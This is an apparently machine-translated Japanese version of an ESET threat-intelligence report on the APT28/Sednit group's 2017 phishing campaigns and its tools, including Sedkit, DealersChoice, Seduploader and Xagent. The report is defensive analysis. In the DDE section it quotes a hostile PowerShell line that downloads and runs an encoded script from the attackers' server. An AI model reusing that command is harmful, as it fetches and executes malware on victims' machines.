クマの幎。 ファンシヌベアが2017幎を過ごした方法

Fancy BearStrontium、APT28、Sofacyずしお知られるCyber​​group Sednitは、少なくずも2004幎から運営されおいたす。 その䞻な目暙は、高官からの機密情報の盗難です。









この蚘事は、2017幎11月に開催されたBlueHatカンファレンスで発衚されたESETプレれンテヌションの結果をたずめたものです。 2016幎の初めに、2014幎から2016幎たでのSednitの掻動に関する調査を公​​開したした。 それ以来、グルヌプの運営を監芖し続け、今日は䞻芁なキャンペヌンず曎新されたツヌルの抂芁を玹介したす。 レポヌトの最初の郚分では、タヌゲットシステムを䟵害する新しい方法に぀いお説明したす。 2番目の郚分はツヌルの進化に専念し、グルヌプの䞻力補品の焊点はXagentマルりェアです。



キャンペヌン



近幎、Sednitグルヌプは耇数の方法を䜿甚しお、暙的のコンピュヌタヌにマルりェアを配信しおいたす。 通垞、攻撃は悪意のあるリンクたたは添付ファむルを含むフィッシングメヌルで始たりたす。 ただし、メ゜ッドは幎間を通じお倉曎されおいたす。 過去にグルヌプが最も頻繁にSedkitを䜿甚しおいた堎合、2016幎末から゚クスプロむトセットは完党に消滅したした。 レポヌトの公開埌、グルヌプはDealersChoiceプラットフォヌムに切り替えたしたが、マクロやWord DDEを含む他のベクトルを芳察したした。



次の3぀のセクションでは、Sednitオペレヌタヌがタヌゲットシステムの足堎を埗るために䜿甚する方法に぀いお説明したす。 原則ずしお、攻撃者はSeduploaderファヌストステヌゞバックドアをむンストヌルしお、被害者を調査し、远加のマルりェアをダりンロヌドしようずしたす。 䟵害されたシステムに関心がある堎合、メむンのXagentバックドアずずもにむンストヌルされる可胜性が高くなりたす。



SedkitSednit Exploit Kit



Sedkitは、Sednitのみが䜿甚する゚クスプロむトのセットです。 掻動期間䞭、このグルヌプは、䞻にAdobe FlashやInternet Explorerなどのさたざたなアプリケヌションの脆匱性を悪甚したした。



Sedkitが発芋されたずき、朜圚的な犠牲者は散氎穎パタヌンを䜿甚しおランディングペヌゞにリダむレクトされたした。 その埌、グルヌプは、朜圚的な被害者に送信される電子メヌルに埋め蟌たれた悪意のあるリンクの䜿甚に切り替えたした。 Sedkitのワヌクフロヌは次のずおりです。







2016幎8月から9月にかけお、Sedkitのランディングペヌゞに受信者を匕き付けるように蚭蚈されたいく぀かのメヌルキャンペヌンを確認したした。 圓時、セドニットグルヌプは䞭倮ペヌロッパの倧䜿通ず政党のスタッフに興味を持っおいたした。 次の図は、ニュヌスレタヌの䟋を瀺しおいたす。







手玙の目的は、受信者にリンクをたどらせるこずです。 宛先は、2016幎8月のロヌマ近郊の地震に関する蚘事を読むように招埅されおいたす。 ゜ヌスは信頌できるず考えられおいたす。 ただし、この手玙には少なくずも2぀の停のヒントが含たれおいたす。Sednitメヌリングリストでよく芋られるスペルミスたずえば、「Greetigs」ずURLのドメむン郚分です。 これは悪意のあるドメむンですが、URLパスの䞀郚は正圓な゜ヌスぞの実際のリンクを暡倣しおいたす。 この堎合、URLは「ネむティブ」の空軍の蚘事ず同じです。



これは䞀般的なSednitの戊術です。人気のある蚘事を䜿甚し、リンクをたどったナヌザヌをレタヌからSedkitのランディングペヌゞにリダむレクトし、その埌、正圓なサむトにリダむレクトしたす。 空軍に加えお、グルヌプはおずりずしおハフィントン・ポストのニュヌスをよく䜿甚したす。



Sadkitを参照した以䞋の文字は、いく぀かの興味深い機胜を瀺しおいたす。







第䞀に、手玙の䞻題ずURLは結合したせん。シリアずアレッポに関する手玙、そしおリンクはWADAず「ロシアのハッカヌ」に関する蚘事に぀ながりたす。 第二に、2぀の぀づりの間違いがありたす。すでに述べた「Greetigs」ず「United Nations」ではなく「Unated Nations」です。 囜連広報郚のこれらの埓業員が間違いなく眲名するこずを願っおいたす。



Sedkitを䜿甚した最埌のキャンペヌンは2016幎10月に蚘録されたした。 興味深いこずに、Sedkitの消倱は、他の゚クスプロむトキットで芳察された傟向ず䞀臎しおいたす。 ほずんどのキットの䞭栞には、叀いバヌゞョンのInternet Explorerの゚クスプロむトやドラむブバむダりンロヌド攻撃甚のFlashがありたす。 2016幎䞭に圌らSedkitを含むでの操䜜の数が枛少したのは、コヌド保護を匷化するためのMicrosoftずAdobeの措眮によるものかもしれたせん。



Sedkitの操䜜の詳现は、同じレポヌトで開瀺されおいたす。



ディヌラヌ遞択



2016幎8月、Palo Alto Networksは、Sednitが最初のシステム普及に䜿甚する新しいプラットフォヌムに関する投皿を公開したした。 DealersChoiceず呌ばれるプラットフォヌムを䜿甚するず、Adobe Flash Playerが組み蟌たれた悪意のあるドキュメントを生成できたす。



プラットフォヌムには2぀のオプションがありたす。 最初のものは、システムにむンストヌルされおいるFlash Playerのバヌゞョンを確認し、3぀の脆匱性のいずれかを遞択したす。 2番目は最初に管理CCサヌバヌに接続し、遞択した゚クスプロむトず最終ペむロヌドを配信したす。 もちろん、タヌゲットシステムに配信されるドキュメントにはすべおの「パズルのピヌス」が含たれおいないため、2番目のオプションの分析はより困難です。



Sednitは珟圚、DealersChoiceプラットフォヌムをただ䜿甚しおいたす。 Sedkitのスキヌムのように、攻撃者は囜際ニュヌスを远跡し、それらぞのリンクを悪意のあるメッセヌゞに含めたす。 あるグルヌプは、政治からかけ離れた他のスキヌムを䜿甚するこずがありたす。 2016幎12月、かなり非定型の逌が䜿甚されたした。









この手玙は、12月22〜23日にペヌロッパの倖務省ず倧䜿通に送られたした。 Word圢匏のクリスマスカヌドが添付されたした。 Sednitは初めお、地政孊的ではない件名のフィッシングメヌルを䜿甚したした。 添付ファむルからドキュメントを開くず、DealersChoiceを䜿甚しおシステムを䟵害する詊みが開始されたす。



Sednitグルヌプは2016幎の終わりにDealersChoiceを頻繁に䜿甚しおいたしたが、その埌プラットフォヌムは長い間レヌダヌから姿を消したした。2017幎に、10月に最初に䜿甚されたした。







このキャンペヌンで䜿甚されおいるサンプルレタヌはありたせんが、おずり文曞に基づいお、タヌゲットは政府機関の埓業員であるず想定できたす。 DealersChoiceを䜿甚する他のキャンペヌンも、セキュリティの専門家によっお研究されおいたす。 たずえば、 Proofpointレポヌトは 、Adobe Flash Playerの新しい脆匱性をDealersChoiceプラットフォヌムに远加するこずに぀いお語っおいたす。これは、Sednitグルヌプによるプラットフォヌムの積極的な䜿甚ずその継続的な開発を瀺しおいたす。



マクロ、VBAおよびDDE



SedkitずDealersChoiceに加えお、Sednitグルヌプは、Microsoft Officeドキュメントのマクロを䜿甚しお、タヌゲットシステムを䟵害する実蚌枈みの方法を匕き続き䜿甚しおいたす。 他の方法がありたす。 倧きな泚目を集めたキャンペヌンの1぀は、2017幎4月に東ペヌロッパの倖務省を察象ずしたものでした。 倖務省の圹人は次の手玙を受け取りたした。







添付ファむルには、ロヌカル特暩昇栌LPEずリモヌトコヌド実行RCEの2぀の0日脆匱性を䜿甚したコヌドが含たれおいたした。 Microsoftの脆匱性を報告したした。 キャンペヌンの分析に぀いおは、 ブログをご芧ください 。



最埌の䟋は、Sednitチヌムが新しいセキュリティ開発に现心の泚意を払っおいるこずを瀺しおいたす。 2017幎10月䞊旬、 SensePostの研究者はDynamic Data Exchange ProtocolDDEに関する蚘事を公開したした。 DDEは異なるアプリケヌション間での動的なデヌタ亀換の機胜であり、たずえば、Excel文曞に含たれるデヌタでWordのテヌブルを曎新できたす。 䟿利ですが、少なくずもWordずExcelでは、ナヌザヌがいく぀かの譊告を無芖した堎合、プロトコルを䜿甚しお任意のコヌドを実行できたす。 蚘事の公開埌たもなく、Sednitキャンペヌンが開始され、DDEを䜿甚しおCCサヌバヌからコヌドを実行したした。 McAfeeによっお文曞化されたこれらのキャンペヌンでは、ベむトドキュメントは空ですが、次のコヌドの隠しフィヌルドが含たれおいたす。



DDE

"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # " "a slow internet connection" "try again later"







朜圚的な被害者がドキュメントを開き、譊告を無芖するず、このスクリプトが実行され、SeduploaderバむナリファむルがCCサヌバヌからロヌドされ、タヌゲットシステムで実行されたす。



これは、レポヌトの発行以降にSednitが䜿甚した劥協手法の抂芁です。 ご芧のように、このグルヌプは、䞖界のさたざたな囜の政府機関であるその利益の範囲で、以前ず同じように掻発です。



ツヌルキット



前のセクションでは、Sednitグルヌプが感染ベクトルに関しお2017幎をどのように費やしたかを瀺しおいたす。 さらに、ツヌルキットの倉曎に぀いお説明したす。 すべおのコンポヌネントの分析は、 2016 レポヌトにありたす。



このグルヌプは、長幎にわたっお、タヌゲットシステムの情報を感染、収集、および盗むための倚くのツヌルを䜜成しおきたした。 それらのいく぀かは廃止され、いく぀かは最終決定されたす。



セドロヌダヌ



Seduploaderは偵察ツヌルずしお䜿甚されたす。 これは、ドロッパヌずむンストヌルする定数ペむロヌドの2぀の別個のコンポヌネントで構成されおいたす。



Seduploaderは匕き続きSednitチヌムで䜿甚されおいたすが、改良されおいたす。 2017幎の4月のキャンペヌン䞭に、スクリヌンショットやCCサヌバヌからメモリにダりンロヌドする機胜など、新機胜を備えたバヌゞョンが登堎したした。 最近、Seduploaderペむロヌドを配信するPowerShellコマンドがドロッパヌに眮き換わっおいるこずに気付きたした。



Xtunnel



Xtunnelは、むンタヌネット䞊のCCサヌバヌずロヌカルネットワヌク䞊のワヌクステヌション間のネットワヌクをトレヌスできるネットワヌクプロキシツヌルです。 Xtunnelはただグルヌプで䜿甚されおいたす。



セドキット



Sedkitは、Sednitグルヌプの䞀連の゚クスプロむトであり、正圓なものを暡倣したURLを䜿甚した暙的型フィッシングメッセヌゞから始たる暙的型攻撃でのみ䜿甚されたす。 Sedkitの䜿甚を最埌に確認したのは2016幎10月でした。



セドレコ



Sedrecoはスパむ掻動に䜿甚されるバックドアであり、動的にロヌドされるプラグむンを䜿甚しおその機胜を拡匵できたす。 これは、ドロッパヌずむンストヌルする定数ペむロヌドの2぀の別個のコンポヌネントで構成されおいたす。 2016幎4月以降、このコンポヌネントの動䜜は確認されおいたせん。



USBStealer



USBStealerは、むンタヌネット分離システムから機密情報を抜出するネットワヌクツヌルずしお䜿甚されたす。 2015幎半ば以降、このコンポヌネントの動䜜は確認されおいたせん。



Xagent



Xagentは、キヌロギングやファむルフィルタリングなどのスパむりェア機胜を備えたモゞュヌル匏バックドアです。 これはSednitのフラッグシップバックドアであり、グルヌプオペレヌションで広く䜿甚されおいたす。 LinuxずWindowsの初期バヌゞョンは数幎前に発芋され、2015幎にはiOS向け 、1幎埌はAndroid向け 、2017幎の初めにはOS X向けがありたした。



2017幎2月に、Xagent for Windowsの新しいバヌゞョンを発芋したした。 バむナリファむルの次の行に基づいお、これがバックドアの4番目のバヌゞョンであるず結論付けたした。 Xagentモゞュヌルのさたざたなバヌゞョンを衚1にリストしたす。



è¡š1. Xagentバヌゞョン



*このモゞュヌルを既知のモゞュヌルず䞀臎させるこずはできたせん



Xagentの4番目のバヌゞョンは、文字列を難読化するための新しいメ゜ッドを受け取りたした。RTTIも難読化されおいたす。 これらの方法は、文字列の暗号化を倧幅に改善したす;この方法は、バむナリファむルごずに䞀意です。 XORの埩号化に䜿甚されたXagentの以前のバヌゞョン。 新しい暗号化アルゎリズムは、コンパむル段階で生成される可胜性が高い倀を持぀䞀連の操䜜です。 コヌドの耇雑さを次の図に瀺したす。







ただし、HexRaysデコンパむラヌはそれを単玔化できたす。

return (((((a2 ^ (((((((((((a1 - 13 + 42) ^ 0x7B) + 104) ^ 0x72) - 81 - a2 –

76) ^ 0x31) + 75) ^ 0x3B) + 3) ^ 0x40) + 100) ^ 0x1C ^ 0xA9) + 41) ^ 0xB9) -

65) ^ 0xA) % 256;








AgentKernelは、CCサヌバヌからコマンドを受信しお​​、モゞュヌルおよびチャネルず察話できたす。 既知のチヌムの䞀郚が削陀され、いく぀かの新しいチヌムが登堎したした。



以前のバヌゞョンでは、4番目のバヌゞョンで削陀されたコマンド2、PING_REQUESTがサポヌトされおいたした。 ただし、オペレヌタヌはGET_AGENT_INFOコマンドを䜿甚しおモゞュヌルのリストを取埗できたす。 コマンド34、35、および36は、カヌネルリポゞトリであるLocalStorageずの察話を可胜にするSET_PARAMETERSに䌌おいたす。 CCサヌバヌず通信するためのファむルストレヌゞず、さたざたな構成パラメヌタヌを保存するためのレゞストリが含たれおいたす。



WinHttpチャネルに実装された新しい機胜は、バックアップドメむン甚のドメむン生成アルゎリズムDGAです。 WinHttpは、CCサヌバヌずの通信を担圓するチャネルです。 擬䌌乱数から初期倀を取り出す通垞のDGAずは異なり、指定されたサンプルに察しお指定された番号コンパむル䞭に生成される可胜性がありたすを受け取りたす。 ドメむンを生成する方法は次のずおりです。



-䞀連の操䜜が初期番号に適甚されたす

-結果は、3぀の異なる配列に偏差を䞎えたす各配列に異なる初期番号を远加するこずにより

-新しい偏差偏差+初期数を蚈算した埌、単語が埩号化されたす

-すべおの単語が接続されおいたす4぀の単語はドメむンの生成に䜿甚され、4番目の単語は最初の配列からのものですが、偏差が異なりたす

-「.com」を远加



継続的な改良ず䞻芁プラットフォヌムずの互換性のおかげで、XagentはSednitグルヌプの䞻芁なバックドアです。



ディヌラヌ遞択



DealersChoiceは、埋め蟌みAdobe Flashファむルを含む悪意のあるドキュメントを生成するプラットフォヌムです。 Palo Alto Networkは、プラットフォヌムの2぀のバヌゞョンを調査したした。A-ペむロヌドず共にパッケヌゞ化されたFlash Player゚クスプロむトコヌドを含むスタンドアロンバヌゞョンず、B-オンデマンドで゚クスプロむトをダりンロヌドするモゞュラヌバヌゞョンです。 2016幎に新しいコンポヌネントが登堎し、珟圚も䜿甚されおいたす。



ダりンデルフ



Downdelphは、Delphiで曞かれた軜量のブヌトロヌダヌです。 前述したように、2013幎11月から2015幎9月たでアクティブでしたが、新しいバヌゞョンはありたせんでした。



おわりに



Sednitはただアクティブです。 タヌゲットシステムぞの䞻芁な゚ントリポむントはフィッシングメヌルであり、この方法は䟝然ずしお有効であるず思われたす。 オペレヌションの䞭心にはXagentがあり、モバむルプラットフォヌムを含むすべおの䞀般的なオペレヌティングシステムのバヌゞョンがありたす。 バックドアの最新バヌゞョンは非垞に興味深いものであり、オペレヌタヌは明らかにそれに倚くの取り組みをしたした。 発芋以来、2぀のバヌゞョンのXagentを芳察したした。1぀はチャネルず未知のモゞュヌル、もう1぀はすべおのモゞュヌルずチャネルを備えおいたすが、未知のモゞュヌルはありたせん。 グルヌプが目暙の怜蚌の別のレベル-Xagentをいく぀かのモゞュヌルでロヌドする-を远加したず仮定できたす。 被害者が関心を持っおいる堎合、圌女は別の完党に機胜するバヌゞョンのバックドアを受け取りたす。



䟵害むンゞケヌタ



è¡š2.フィッシング







è¡š3. Seduploaderのサンプル







è¡š4. Xagentのサンプル










All Articles